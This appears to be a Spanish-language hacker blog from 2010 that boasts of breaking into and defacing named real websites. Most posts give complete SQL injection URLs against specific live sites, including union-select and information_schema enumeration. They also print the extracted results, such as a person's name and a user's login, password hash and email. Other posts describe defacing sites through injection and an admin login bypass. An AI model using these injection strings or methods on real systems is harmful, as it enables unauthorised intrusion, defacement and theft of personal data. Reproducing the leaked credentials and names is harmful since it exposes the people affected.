Publicado el 10/08/2010 12:08:00 en Bug Report.
Sobre las 6:30 am,comenze el proceso de "Ownear" el sitio web llamado "www.segundadivisionfmf.org.mx",el método que utilize fue MSSQL Injection,y no me fue nada difícil modificar el "index" por vía UPDATE. ^^
El index es bastante sencillo porque tengo mejores cosas que "defacear". XD
Dedicado a Dios de la Red en general.
http://www.segundadivisionfmf.org.mx
Comentarios: 20 | Leer comentarios
Publicado el 10/08/2010 12:08:00 en Bug Report. Total de votos: 0 Votar
Site: http://investigacion.ilce.edu.mx
Script vulnerable: st.asp
Variable no filtrada: ?id=
Panel del Admin: http://investigacion.ilce.edu.mx/panel_control/
Inyección:
http://investigacion.ilce.edu.mx/st.asp?id=%27%27%20group%20by%20c.primer_menu_superior,c.segundo_menu_superior,c.menu_lateral,s.css,p.clave_pagina,p.incluir_titulos_con_ligas,p.titulo,p.url,p.clave_estatus,p.orden,c.categoria,c.fondo,p.fondo,c.clave_categoria,p.mostrar_encabezado,p.mostrar_boton_de_impresion,p.incluir_en_pasa_paginas,p.mostrar_control_de_menu_lateral,p.clave_sitio,p.mostrar_margenes,p.mostrar_banner,s.clave_idioma_predeterminado,p.mostrar_calendario,p.mostrar_anuncio,c.titulo_anuncio,c.anuncio,p.ancho_del_anuncio,p.alto_del_anuncio,c.acceso_condicionado_a_calificacion_del_cuestionario,c.acceso_condicionado_a_calificacion_del_foro,p.encabezado,p.velocidad_anuncio%20having%201=1%20--
Comentarios: 1 | Leer comentarios
Publicado el 09/08/2010 12:08:00 en Bug Report. Total de votos: 1 Votar
Site: http://www.biapi.com/
Script vulnerable: agencia.php
Variable no filtrada: ?id=
Versión: 5.0.51a-3ubuntu5.5-log
Usuario: apibnc@localhost
Basedir: /usr/
Inyección:
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.tables--
Printea:
Inyección.Tablas (Con Group_Concat()):
Printea (Cortado):
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,API_CCC,API_Tvaloraciones,API_articulos,API_cambios_datos,API_cambios_datos_alta_despacho,API_cambios_da
Inyección.Columna (API_cambio_datos):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns+where+table_name=char(65,80,73,95,99,97,109,98,105,111,115,95,100,97,116,111,115)--
Printea (Cortado):
id,idcens,nombre_colegiado,n_provincial,n_carnet_nac,nombre,fac_nif,fac_nombre,fac_direccion,fac_cp,fac_provincia,fac_localidad,fac_domiciliacion,fac_pago,pri_dni,pri_fechanac,pri_sexo,pri_telefono,pri_emailpersonal,pri_direccion_part,pri_cp_part,pri_provincia_part,pri_localidad_part,pri_direccion_corr,pri_cp_corr,pri_provincia_corr,pri_lo
Inyección Final (API_cambio_datos):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,concat%28id,0x3a,idcens,0x3a,nombre_colegiado,0x3a,n_provincial,0x3a,n_carnet_nac,0x3a,nombre%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+API_cambios_datos--
Printea:
20:547:VALENCIA GARRIGA, JOAN-RAM�N:1730:11603:VALENCIA GARRIGA, JOAN-RAM�N
Inyección.Columna (API_usuarios):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,group_concat%28column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns+where+table_name=char%2865,80,73,95,117,115,117,97,114,105,111,115%29--
Printea:
id,login,pass,email,nombre,app,privilegios
Inyección Final (API_usuarios):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,concat%28id,0x3a,login,0x3a,pass,0x3a,email,0x3a,nombre,0x3a,app,0x3a,privilegios%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+API_usuarios--
Printea:
5:nestor:seHoVKe8ltQ4s:dpassola@infoself.com:Beta Solutions::
PD: Hecho todo a mano,sin software. ^^
Comentarios: 11 | Leer comentarios
Publicado el 09/08/2010 12:08:00 en Bug Report. Total de votos: 0 Votar
Site: http://keya.cat
Script Vulnerable: categoria-info.php
Variable no filtrada: ?id=
Inyección:
http://keya.cat/categoria-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
Aun no hay sido reportado [
X]
Comentarios: 1 | Leer comentarios
Publicado el 09/08/2010 12:08:00 en Hacking Web.
Todo comienzo a las 8:30 de la mañana cuando estaba navegando por la red y me enconte esta curiosa web,de Madrid (Spain) si no me equivoco,entonces decidi introducirme por una SQLi,pero tenia como 32 o 33 y me cansaba y entonces pense en hacer un Login Bypass y surgio efecto un error poco normal,ya que actualmente en eso los programadores no se equivocan,despues me di cuenta que seguia siendo un usuario de bajo privilegios,me fui para el directorio del Admin:
http://sexo-escorts.com/administrar/
Y si,tambien se podia bypassear,lo malo es que no puse subir una shell,tal vez por que estaba bien asegurada o por que soy un boludo que tiene sueño,entonces desactive unos banners y active la seccion de noticias y desde el titulo lo Ownee. XD
http://sexo-escorts.com/index.php
Comentarios: 5 | Leer comentarios